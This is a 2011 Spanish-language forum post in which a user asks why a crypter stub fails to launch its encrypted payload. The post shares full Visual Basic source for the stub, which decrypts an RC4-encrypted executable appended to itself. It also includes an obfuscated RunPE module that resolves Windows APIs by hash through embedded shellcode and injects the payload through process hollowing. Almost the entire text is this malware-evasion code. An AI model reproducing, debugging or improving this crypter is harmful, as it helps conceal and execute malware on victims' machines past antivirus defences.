duda con runpe
Publicado: 03 Dic 2011, 19:15
ola amigos estoy utilizando la tool de M3n3g@tt1 runpe generator m3 y esti desesperao e intentao de toas maneras para llamar al runpe de todas las opciones que echo esta es la mejor xk nome da error ninguno pero pasa una cosa queno abre el encryptado ave sime podeis echar un cable con la llamada del runpe os dejo el stub y el runpe para que lo veais grasias a todos
Código: Seleccionar todo
Sub Main()
Dim SHIT As String
SHIT = App.Path & "\" & App.EXEName & ".exe"
Dim Data As String
Open SHIT For Binary As #1
Data = Space(LOF(1))
Get #1, , Data
Close #1
Dim Delimiter() As String
Delimiter() = Split(Data, "[Theref]")
Delimiter(1) = RC4(Delimiter(1), "therefenge")
Call Inject(App.Path & "\" & App.EXEName & ".exe", StrConv(Delimiter(1), vbFromUnicode), Command)
End SubCódigo: Seleccionar todo
Option Explicit
Option Base 0
Private Type MopFlsArsNh
StsGuthRmoOALo As Long
End Type
Private Type EqMlFsPpRtjMRlJi
RqhJBisFAlmERunFC As Byte
CqnSNmLj As Byte
B3 As Byte
MtGlliJjpGt As Byte
End Type
Private Declare Function CallWindowProcA Lib "user32" (ByVal DpiSQlOm As Long, Optional ByVal FtqLSBJrt As Long, Optional ByVal PhpQnqoKo As Long, Optional ByVal GnlAFuhnm As Long, Optional ByVal KjoFLpCQq As Long) As Long
Private KGisSrLPA As Boolean
Private qSmirQoBrnoKj(170) As Byte
Private DhiEChoMJPBD(255) As Byte
Private Const kernel32 As String = "KERNEL32"
Private Const NTDLL As String = "NTDLL"
Public Function Inject(ByRef EiLCQBnltrFqlBhmOlDoFm() As Byte, ByVal piqGu As String, Optional ByVal KCjEOhoNOE As String, Optional ByRef lMnOrSiGmNmOiLului As Long) As Boolean
Dim tJnPPqrREonrDn As Long
Dim AoDtpNuE As Long
Dim RsqtPn As Long
Dim jnltLGnP As Long
Dim RjGnFoioRp As Long
Dim puomPFFDEArs(16) As Long
Dim BuLmCoDuiAEp(3) As Long
Dim iusrnACC(50) As Long
tJnPPqrREonrDn = VarPtr(EiLCQBnltrFqlBhmOlDoFm(0))
If Not jRhBsmoCijAropDorNntNiqNhnGl(tJnPPqrREonrDn, 2) = &H5A4D Then Exit Function
AoDtpNuE = tJnPPqrREonrDn + jRhBsmoCijAropDorNntNiqNhnGl(tJnPPqrREonrDn + &H3C)
If Not jRhBsmoCijAropDorNntNiqNhnGl(AoDtpNuE) = &H4550 Then Exit Function
jnltLGnP = jRhBsmoCijAropDorNntNiqNhnGl(AoDtpNuE + &H34)
puomPFFDEArs(0) = &H44
Call pOp(kernel32, &H16B3FE88, StrPtr(piqGu), StrPtr(KCjEOhoNOE), 0, 0, 0, &H4, 0, 0, VarPtr(puomPFFDEArs(0)), VarPtr(BuLmCoDuiAEp(0)))
Call pOp(NTDLL, &HF21037D0, BuLmCoDuiAEp(0), jnltLGnP)
Call pOp(NTDLL, &HD33BCABD, BuLmCoDuiAEp(0), VarPtr(jnltLGnP), 0, VarPtr(jRhBsmoCijAropDorNntNiqNhnGl(AoDtpNuE + &H50)), &H3000, &H40)
Call pOp(NTDLL, &HC5108CC2, BuLmCoDuiAEp(0), jnltLGnP, VarPtr(EiLCQBnltrFqlBhmOlDoFm(0)), jRhBsmoCijAropDorNntNiqNhnGl(AoDtpNuE + &H54), 0)
For RjGnFoioRp = 0 To jRhBsmoCijAropDorNntNiqNhnGl(AoDtpNuE + &H6, 2) - 1
RsqtPn = AoDtpNuE + &HF8 + (&H28 * RjGnFoioRp)
Call pOp(NTDLL, &HC5108CC2, BuLmCoDuiAEp(0), jnltLGnP + jRhBsmoCijAropDorNntNiqNhnGl(RsqtPn + &HC), tJnPPqrREonrDn + jRhBsmoCijAropDorNntNiqNhnGl(RsqtPn + &H14), jRhBsmoCijAropDorNntNiqNhnGl(RsqtPn + &H10), 0)
Next RjGnFoioRp
iusrnACC(0) = &H10007
Call pOp(NTDLL, &HE935E393, BuLmCoDuiAEp(1), VarPtr(iusrnACC(0)))
Call pOp(NTDLL, &HC5108CC2, BuLmCoDuiAEp(0), iusrnACC(41) + &H8, VarPtr(jnltLGnP), &H4, 0)
iusrnACC(44) = jnltLGnP + jRhBsmoCijAropDorNntNiqNhnGl(AoDtpNuE + &H28)
Call pOp(NTDLL, &H6935E395, BuLmCoDuiAEp(1), VarPtr(iusrnACC(0)))
Call pOp(NTDLL, &HC54A46C8, BuLmCoDuiAEp(1), 0)
lMnOrSiGmNmOiLului = BuLmCoDuiAEp(0)
Inject = True
End Function
Private Function jRhBsmoCijAropDorNntNiqNhnGl(ByVal lPtr As Long, Optional ByVal lSize As Long = &H4) As Long
Call pOp(NTDLL, &HC5108CC2, -1, VarPtr(jRhBsmoCijAropDorNntNiqNhnGl), lPtr, lSize, 0)
End Function
Public Function pOp(ByVal OjiAimDRt As String, ByVal JrClh As Long, ParamArray KniF() As Variant) As Long
Dim RsMSNl As Variant
Dim qtKjtmEO As EqMlFsPpRtjMRlJi
Dim mnRCqmBDinupo As Long
Dim RjGnFoioRp As Long
Dim tqnMhrr As Long
If Not KGisSrLPA Then
For RjGnFoioRp = 0 To 170
qSmirQoBrnoKj(RjGnFoioRp) = CByte(Choose(RjGnFoioRp + 1, &HE8, &H22, &H0, &H0, &H0, &H68, &HA4, &H4E, &HE, &HEC, &H50, &HE8, &H43, &H0, &H0, &H0, &H83, &HC4, &H8, &HFF, &H74, &H24, &H4, &HFF, &HD0, &HFF, &H74, &H24, &H8, &H50, &HE8, &H30, &H0, &H0, &H0, &H83, &HC4, &H8, &HC3, &H56, &H55, &H31, &HC0, &H64, &H8B, &H70, &H30, &H8B, &H76, &HC, &H8B, &H76, &H1C, &H8B, &H6E, &H8, &H8B, &H7E, &H20, &H8B, &H36, &H38, &H47, &H18, &H75, &HF3, &H80, &H3F, &H6B, &H74, &H7, &H80, &H3F, &H4B, &H74, &H2, &HEB, &HE7, &H89, &HE8, &H5D, &H5E, &HC3, &H55, &H52, &H51, _
&H53, &H56, &H57, &H8B, &H6C, &H24, &H1C, &H85, &HED, &H74, &H43, &H8B, &H45, &H3C, &H8B, &H54, &H5, &H78, &H1, &HEA, &H8B, &H4A, &H18, &H8B, &H5A, &H20, &H1, &HEB, &HE3, &H30, &H49, &H8B, &H34, &H8B, &H1, &HEE, &H31, &HFF, &H31, &HC0, &HFC, &HAC, &H84, &HC0, &H74, &H7, &HC1, &HCF, &HD, &H1, &HC7, &HEB, &HF4, &H3B, &H7C, &H24, &H20, &H75, &HE1, &H8B, &H5A, &H24, &H1, &HEB, &H66, &H8B, &HC, &H4B, &H8B, &H5A, &H1C, &H1, &HEB, &H8B, &H4, &H8B, &H1, &HE8, &H5F, &H5E, &H5B, &H59, &H5A, &H5D, &HC3))
Next RjGnFoioRp
RjGnFoioRp = 0
KGisSrLPA = True
End If
mnRCqmBDinupo = CallWindowProcA(VarPtr(qSmirQoBrnoKj(0)), StrPtr(OjiAimDRt), JrClh)
If mnRCqmBDinupo Then
For tqnMhrr = UBound(KniF) To LBound(KniF) Step -1
qtKjtmEO = oDqNpsCs(CLng(KniF(tqnMhrr)))
Call nKjqK(&H68, RjGnFoioRp)
Call nKjqK(qtKjtmEO.RqhJBisFAlmERunFC, RjGnFoioRp): Call nKjqK(qtKjtmEO.CqnSNmLj, RjGnFoioRp)
Call nKjqK(qtKjtmEO.B3, RjGnFoioRp): Call nKjqK(qtKjtmEO.MtGlliJjpGt, RjGnFoioRp)
Next tqnMhrr
qtKjtmEO = oDqNpsCs(mnRCqmBDinupo)
Call nKjqK(&HB8, RjGnFoioRp)
Call nKjqK(qtKjtmEO.RqhJBisFAlmERunFC, RjGnFoioRp): Call nKjqK(qtKjtmEO.CqnSNmLj, RjGnFoioRp)
Call nKjqK(qtKjtmEO.B3, RjGnFoioRp): Call nKjqK(qtKjtmEO.MtGlliJjpGt, RjGnFoioRp)
Call nKjqK(&HFF, RjGnFoioRp): Call nKjqK(&HD0, RjGnFoioRp)
Call nKjqK(&HC3, RjGnFoioRp)
pOp = CallWindowProcA(VarPtr(DhiEChoMJPBD(0)))
End If
End Function
Private Sub nKjqK(ByVal RtnKssmDESCLBD As Byte, ByRef rKjRoAnlrQ As Long)
DhiEChoMJPBD(rKjRoAnlrQ) = RtnKssmDESCLBD
rKjRoAnlrQ = rKjRoAnlrQ + 1
End Sub
Private Function oDqNpsCs(ByVal jBtiMtD As Long) As EqMlFsPpRtjMRlJi
Dim uLptJlthnNlmGolJ As MopFlsArsNh
uLptJlthnNlmGolJ.StsGuthRmoOALo = jBtiMtD
LSet oDqNpsCs = uLptJlthnNlmGolJ
End Function
'*** Modo de uso : Call Inject(sByte, sApp.Path , Command) ***